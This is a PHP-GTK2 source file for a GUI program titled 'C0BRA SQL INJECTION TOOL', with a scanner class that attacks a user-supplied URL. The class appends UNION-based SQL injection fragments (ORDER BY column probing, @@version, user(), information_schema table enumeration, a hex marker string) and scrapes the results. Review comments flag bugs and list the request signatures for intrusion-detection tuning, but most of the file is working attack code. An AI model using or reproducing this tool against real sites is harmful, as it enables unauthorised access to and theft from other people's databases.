- <?php
// PHP-GTK2 provides the `gtk` class; none of the GUI code in this file can
// run without it, so stop immediately with a configuration hint.
if (class_exists('gtk') === false) {
    exit("Please load the php-gtk2 module in your php.ini\r\n");
}
/**
 * "clicked" handler wired to the Attack button.
 *
 * Reads the URL from the first entry widget, hands it to scanner and calls
 * scanner::returnTables(), which performs live HTTP requests synchronously
 * inside this callback. Each returned slice is appended, followed by a comma,
 * and the combined string is written into the second entry widget.
 *
 * @param GtkEntry $aTxtBoxA entry holding the URL typed into the dialog
 * @param GtkEntry $aTxtBoxB entry that receives the comma-terminated results
 */
function on_interactive_dialog_clicked($aTxtBoxA,$aTxtBoxB)
{
    $scannerObject = new scanner($aTxtBoxA->get_text());

    // NOTE(review): $textBoxValue is never initialised before the first ".=",
    // so it starts out undefined and stays undefined when nothing is returned.
    foreach ($scannerObject->returnTables() as $slice) {
        $textBoxValue .= $slice . ",";
    }

    $aTxtBoxB->set_text($textBoxValue);
}
// ---- Top-level window -------------------------------------------------------
$mainWindow = new GtkWindow();
$mainWindow->set_title('C0BRA SQL INJECTION TOOL');

// ---- Widgets ----------------------------------------------------------------
$lblCredit = new GtkLabel('Please Enter URI To Attack');
$lblUri = new GtkLabel('_Site Uri', true);
$lblTables = new GtkLabel('_Tables', true);   // constructed but never attached
$uriEntry = new GtkEntry();                   // input: URL handed to scanner
$tablesEntry = new GtkEntry();                // output: comma-terminated results
$txtPassword = new GtkEntry();                // constructed but never attached
$textBuffer = new GtkTextBuffer();            // constructed but never used
$textView = new GtkTextView();                // constructed but never used
$btnCancel = new GtkButton('_Quit');
$btnAttack = new GtkButton('_Attack');

// ---- Layout: 4x2 grid on top, button row underneath --------------------------
$grid = new GtkTable(4, 2);
$grid->attach($lblCredit, 0, 2, 0, 1);
$grid->attach($lblUri, 0, 1, 1, 2);
$grid->attach($uriEntry, 1, 2, 1, 2);
$grid->attach($tablesEntry, 0, 2, 2, 3);

$buttonRow = new GtkHButtonBox();
$buttonRow->set_layout(Gtk::BUTTONBOX_EDGE);
$buttonRow->add($btnCancel);
$buttonRow->add($btnAttack);

$column = new GtkVBox();
$column->pack_start($grid);
$column->pack_start($buttonRow);
$mainWindow->add($column);

// ---- Signal wiring ------------------------------------------------------------
// Closing the window ends the main loop; Quit destroys the window; Attack
// passes both entry widgets to on_interactive_dialog_clicked().
$mainWindow->connect_simple('destroy', array('gtk', 'main_quit'));
$btnCancel->connect_simple('clicked', array($mainWindow, 'destroy'));
$btnAttack->connect_simple('clicked', 'on_interactive_dialog_clicked', $uriEntry, $tablesEntry);

$mainWindow->show_all();
// Hand control to GTK; statements after this line run only once the loop exits.
Gtk::main();
/**
 * UNION-based SQL injection prober for a single caller-supplied URL.
 *
 * Every method works the same way: take the stored URL, append a URL-encoded
 * SQL fragment, fetch the result with file_get_contents(), and cut a
 * fixed-width slice out of the returned HTML.
 *
 * Request signatures produced by the code below (for log review and WAF/IDS
 * tuning):
 *   - a query string ending in `%20order%20by%20<n>--`
 *   - `%20union%20select%20` followed by comma-separated copies of
 *     `@@version`, `user()`, `COUNT(*)`, `table_name` or
 *     `CHAR(0x6775797468656b696e67)`, terminated by `--`
 *   - `%20from%20information_schema.tables`, optionally with
 *     `%20limit%20<i>,1`
 *   - the last character of the supplied URL rewritten as `-<char>`
 *
 * On the server side, bound parameters (or strict integer casting of numeric
 * parameters) keep these appended fragments from being parsed as SQL syntax.
 *
 * NOTE(review): vulnField, dbVersion, numberOfRowsVar, dbUserField and
 * numberTables are assigned below without being declared, i.e. they are
 * created as dynamic properties.
 */
class scanner {
    // Target URL exactly as handed to the constructor.
    protected $originalSiteToAttack;
    // Byte length of that URL; used to cut previously appended fragments off again.
    protected $siteStrln;

    /**
     * Stores the target URL and caches its length.
     *
     * @param string $aSite URL to probe; defaults to the empty string.
     */
    function __construct($aSite = "")
    {
        $this->originalSiteToAttack = $aSite;
        $this->siteStrln = strlen($this->originalSiteToAttack);
    }

    /**
     * Appends "ORDER BY n" to the URL for increasing n and compares the length
     * of each response with the "ORDER BY 1" baseline. Despite the name, an
     * ORDER BY index probes the number of selected columns, not rows.
     *
     * Only getNumberOfRows() calls this, and nothing in this listing calls
     * getNumberOfRows(); buildQuery() and findVulnField() hard-code 2 instead.
     *
     * Traffic: one baseline GET plus up to four further GETs (n = 1..4).
     *
     * @return int|null n - 1 for the first n whose response length differs
     *                  from the baseline; null when the loop ends without a
     *                  difference (no return statement is reached).
     */
    private function numberOfRows()
    {
        $originalSiteToAttack = $this->originalSiteToAttack;
        $originalSiteToAttack.= "%20order%20by%201--";
        // Baseline response for ORDER BY 1.
        $defHtml = file_get_contents($originalSiteToAttack);
        for ($i=1;$i<5;$i++)
        {
            if ($i != 1)
            {
                // Cut the previous fragment off and append the next index.
                $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln);
                $originalSiteToAttack = $originalSiteToAttack . "%20order%20by%20$i--";
            }
            // For $i == 1 this fetches the baseline URL a second time.
            $notDefHtml = file_get_contents($originalSiteToAttack);
            // Only the byte length is compared, not the content.
            if (strlen($notDefHtml) != strlen($defHtml))
            {
                return --$i;
            }
        }
    }

    /**
     * Builds the probe URL for one of the supported options.
     *
     * The last character of the stored URL is replaced by "-<char>"
     * (presumably to negate a trailing numeric parameter value — confirm
     * against the intended input), "%20union%20select%20" is appended, and the
     * option's SQL expression is emitted once per column, comma-separated.
     * The column count is fixed at 2.
     *
     * @param string     $aOption one of "version", "vulnurbilityfield",
     *                            "dbuser", "numberoftables", "tables"
     * @param int|string $aTable  row offset interpolated into "limit <n>,1";
     *                            only read by the "tables" option
     * @return string|null the assembled URL; null for any other option,
     *                     because the switch falls through without returning
     */
    private function buildQuery($aOption,$aTable='')
    {
        $originalSiteToAttack = $this->originalSiteToAttack;
        $numberOfRows = 2;
        //$numberOfRows = $this->numberOfRowsVar;
        // Take the final character, prefix it with "-", and put it back.
        $fieldChar = substr($originalSiteToAttack, -1);
        $fieldChar = "-$fieldChar";
        $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln-1);
        $originalSiteToAttack.="$fieldChar";
        $originalSiteToAttack .= "%20union%20select%20";
        switch ($aOption)
        {
            case "version":
                for ($i=1;$i<=$numberOfRows;$i++)
                {
                    if ($i==$numberOfRows)
                    {
                        // Last column: no trailing comma; break leaves the for loop.
                        $originalSiteToAttack.= "@@version%20";
                        break;
                    }
                    // Not the last column: expression followed by a separator.
                    $originalSiteToAttack.= "@@version%20,";
                }
                $originalSiteToAttack.="--";
                return $originalSiteToAttack;
                break; // unreachable after return
            case "vulnurbilityfield":
                for ($i=1;$i<=$numberOfRows;$i++)
                {
                    if ($i==$numberOfRows)
                    {
                        $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
                        break;
                    }
                    // The hex literal spells the ASCII bytes "guytheking";
                    // locateVulnFieldPos() later searches the response for "king".
                    $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
                }
                $originalSiteToAttack.="--";
                return $originalSiteToAttack;
                break; // unreachable after return
            case "dbuser":
                for ($i=1;$i<=$numberOfRows;$i++)
                {
                    if ($i==$numberOfRows)
                    {
                        $originalSiteToAttack.= "user()";
                        break;
                    }
                    // Not the last column: expression followed by a separator.
                    $originalSiteToAttack.= "user(),";
                }
                $originalSiteToAttack.="--";
                return $originalSiteToAttack;
                break; // unreachable after return
            case "numberoftables":
                for ($i=1;$i<=$numberOfRows;$i++)
                {
                    if ($i==$numberOfRows)
                    {
                        $originalSiteToAttack.= "COUNT(*)";
                        break;
                    }
                    // Not the last column: expression followed by a separator.
                    $originalSiteToAttack.= "COUNT(*),";
                }
                $originalSiteToAttack.="%20from%20information_schema.tables--";
                return $originalSiteToAttack;
                break; // unreachable after return
            case "tables":
                for ($i=1;$i<=$numberOfRows;$i++)
                {
                    if ($i==$numberOfRows)
                    {
                        $originalSiteToAttack.= "table_name";
                        break;
                    }
                    // Not the last column: expression followed by a separator.
                    $originalSiteToAttack.= "table_name,";
                }
                // $aTable is used as the LIMIT offset, one row per request.
                $originalSiteToAttack.="%20from%20information_schema.tables%20limit%20$aTable,1--";
                return $originalSiteToAttack;
                break; // unreachable after return
        }
    }

    /**
     * Fetches the "numberoftables" probe and returns a 10-byte slice of the
     * response, starting at the offset reported by locateVulnFieldPos().
     * Two GET requests per call (the probe itself plus the marker probe).
     *
     * @return string up to 10 bytes of raw response HTML
     */
    private function numberOfTables()
    {
        $originalSiteToAttack = $this->buildQuery("numberoftables");
        $defHtml = file_get_contents($originalSiteToAttack);
        // Offset comes from a separate response (the marker probe), not from $defHtml.
        $relPosition = $this->locateVulnFieldPos();
        return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
    }

    /**
     * Fetches the "version" probe and returns a 10-byte slice of the response,
     * starting at the offset reported by locateVulnFieldPos().
     * Two GET requests per call.
     *
     * @return string up to 10 bytes of raw response HTML
     */
    private function versionNumber()
    {
        $originalSiteToAttack = $this->buildQuery("version");
        $defHtml = file_get_contents($originalSiteToAttack);
        $relPosition = $this->locateVulnFieldPos();
        return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
    }

    /**
     * Fetches the "dbuser" probe and returns a 10-byte slice of the response,
     * starting at the offset reported by locateVulnFieldPos().
     * Two GET requests per call.
     *
     * @return string up to 10 bytes of raw response HTML
     */
    private function dbUser()
    {
        $originalSiteToAttack = $this->buildQuery("dbuser");
        $defHtml = file_get_contents($originalSiteToAttack);
        $relPosition = $this->locateVulnFieldPos();
        return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
    }

    /**
     * Fetches the marker probe ("vulnurbilityfield") and reports where the
     * substring "king" first appears in the response.
     *
     * @return int|false byte offset of "king"; false when strpos() finds no match
     */
    private function locateVulnFieldPos()
    {
        $originalSiteToAttack = $this->buildQuery("vulnurbilityfield");
        $defHtml = file_get_contents($originalSiteToAttack);
        $pos = strpos($defHtml, "king");
        return $pos;
    }

    /**
     * Requests LIMIT offsets 0 through 4 of information_schema.tables and
     * collects one 10-byte response slice per offset. The only data-returning
     * method the GUI handler in this file calls.
     *
     * Traffic per call: 2 GETs from numberOfTables() plus 2 GETs per loop
     * iteration (table probe and marker probe), 12 in total. Each table-probe
     * URL is also echoed to standard output.
     *
     * @return array slices indexed 0..4
     */
    public function returnTables()
    {
        // The count is fetched but not used; the loop bound below is fixed.
        $numberOfTables = $this->numberOfTables();
        for ($i=0;$i<=4;$i++)
        {
            $originalSiteToAttack = $this->buildQuery("tables",$i);
            echo $originalSiteToAttack."\n";
            $defHtml = file_get_contents($originalSiteToAttack);
            $relPosition = $this->locateVulnFieldPos();
            $arrayToReturn[$i] = substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
        }
        return ($arrayToReturn);
    }

    /**
     * Rewrites each "&name=value" parameter of the URL as "&name=-value",
     * appends marker expressions and echoes the resulting URL. The fetch and
     * the marker search are commented out, so no request is sent and nothing
     * is returned.
     *
     * @return void
     */
    private function findVulnField()
    {
        $originalSiteToAttack = $this->originalSiteToAttack;
        $originalSiteToAttack .= "%20union%20select%20";
        $siteStrln = $this->siteStrln;
        // Everything from the first "&" to the end of the string.
        $pattern = '/&.*/';
        preg_match($pattern, $originalSiteToAttack, $matches);
        // The match starts with "&", so element 0 is empty; loops start at 1.
        $explodedGets = explode("&",$matches[0]);
        //$numberOfRows = $this->getNumberOfRows();
        $numberOfRows = 2;
        for ($i=1;$i<count($explodedGets);$i++)
        {
            // Split at "=": $strCutedA keeps "name=", $strCutedB the value.
            $pos = strpos($explodedGets[$i], "=");
            $pos++;
            $strCutedA = substr($explodedGets[$i], 0, $pos);
            $strCutedB = substr($explodedGets[$i], $pos, strlen($explodedGets[$i]));
            // Drop everything from the first "%" onwards in the value.
            $strCutedB = preg_replace('/%.*/', "", $strCutedB);
            $explodedGetsB[$i] = $strCutedA."-".$strCutedB;
        }
        for ($i=1;$i<=count($explodedGetsB);$i++)
        {
            echo "$$$$$$$".$i."\n";
            // The same string is modified on every pass, so fragments accumulate.
            $originalSiteToAttack = str_replace($explodedGets[$i],$explodedGetsB[$i],$originalSiteToAttack);
            for ($j=1;$j<=$numberOfRows;$j++)
            {
                if ($j==$numberOfRows)
                {
                    $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
                    //break;
                }
                // With the break commented out, this line also runs on the last pass.
                $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
            }
            $originalSiteToAttack.="--";
            echo $originalSiteToAttack."\n";
            //$defHtml = file_get_contents($originalSiteToAttack);
            //$pos = strrpos($defHtml,"king");
            //echo $pos;
        }
    }

    /**
     * Runs findVulnField() and stores its result in $this->vulnField.
     *
     * @return null findVulnField() has no return statement
     */
    public function getVulbField()
    {
        $this->vulnField = $this->findVulnField();
        return $this->vulnField;
    }

    /**
     * Runs versionNumber() and stores the slice in $this->dbVersion.
     *
     * @return string up to 10 bytes of raw response HTML
     */
    public function getVersionNumber()
    {
        $this->dbVersion = $this->versionNumber();
        return $this->dbVersion ;
    }

    /**
     * Runs numberOfRows() and stores the result in $this->numberOfRowsVar.
     * Not called anywhere in this listing.
     *
     * @return string the stored value with a trailing newline appended
     */
    private function getNumberOfRows()
    {
        $this->numberOfRowsVar = $this->numberOfRows();
        return $this->numberOfRowsVar."\n";
    }

    /**
     * Runs dbUser() and stores the slice in $this->dbUserField.
     *
     * @return string up to 10 bytes of raw response HTML
     */
    public function getUser()
    {
        $this->dbUserField = $this->dbUser();
        return $this->dbUserField;
    }

    /**
     * Runs numberOfTables() and stores the slice in $this->numberTables.
     *
     * @return string up to 10 bytes of raw response HTML
     */
    private function getNumberOfTables()
    {
        $this->numberTables = $this->numberOfTables();
        return $this->numberTables;
    }

    /**
     * Fetches the table count into a local variable and discards it;
     * there is no return statement.
     *
     * @return void
     */
    private function getTables()
    {
        $numberOfTables = $this->getNumberOfTables();
    }

    /**
     * @return string the target URL as supplied to the constructor
     */
    public function __toString()
    {
        return $this->originalSiteToAttack;
    }
}
// Command-line options: -t <target URL>, -d <database name>. Both values are
// read here, but every statement that would use them is commented out below.
$arguments = getopt('t:d:');
$target = $arguments['t'];
$db = $arguments['d'];
- //$scannerObject = new scanner($target);
- //echo $scannerObject->getVersionNumber();
- //echo $scannerObject->getUser();
- //echo $scannerObject->returnTables();
- //echo $scannerObject->getVulbField();
- //for ($i=0; $i<strlen($string); $i++) {
- // echo $string[$i];
- //}
- ?>